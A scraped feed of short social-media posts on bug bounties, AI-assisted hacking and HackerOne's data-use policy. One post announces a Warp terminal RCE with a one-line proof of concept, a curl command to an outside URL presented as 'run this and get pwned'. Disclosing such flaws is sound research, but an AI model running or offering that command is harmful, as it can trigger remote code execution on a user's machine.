TUIs getting stronger only means they’re also making it fun to hack. @warpdotdev terminal RCE by @rootxharsh and @HacktronAI PoC: run this in warp terminal and get pwned. curl htxp://rce.ee/warp-pwn.php Details below:

Hacking Google with A.I. for $500,000 brutecat.com/r/hacking-googl…

69,000 Claude Skills, one index. 📚 Huge credit to @Behi_Sec for this repo — skills for Claude Code, Cursor & Windsurf, organized by category. Pair it with Atlas Cloud's unified API for the 300 models behind your agents. #API #Atlascloud #Claude #ClaudeCode #AIAgents #MCP #Cursor #Windsurf #DevTools

A developer posted this on Reddit, and I haven't stopped thinking about it.

“Bug bounty is dying” is noise. Lock in. Make money. Use AI to 10x your output. If it eventually dries up, you’ll have enough capital to start that biz or enough experience to land a job. Simple as that.

Yesterday, we announced new product capabilities, and some of our messaging created confusion. We want to be direct. Researcher submissions are not used to train, fine-tune, or otherwise improve generative AI models. This applies across our platform, including H1 Continuous Testing, H1 Agentic PTaaS, and Hai. Third-party model providers we work with are also prohibited from retaining or using researcher data for their own training. We've updated our website language to reflect this more clearly. We heard your concerns, and we take them seriously.

the job market to a junior dev

I'm not sure the community will like this. @Hacker0x01 will now reuse your novel techniques / exploits / old reports to look for vulns on the rest of the customer's infra. I guess they will add you as collab and give you a bounty, right? right?!

“Mom, how did we got so rich?” “You father stopped d*cking around with bug bounty programs and sold his exploits to Western governments”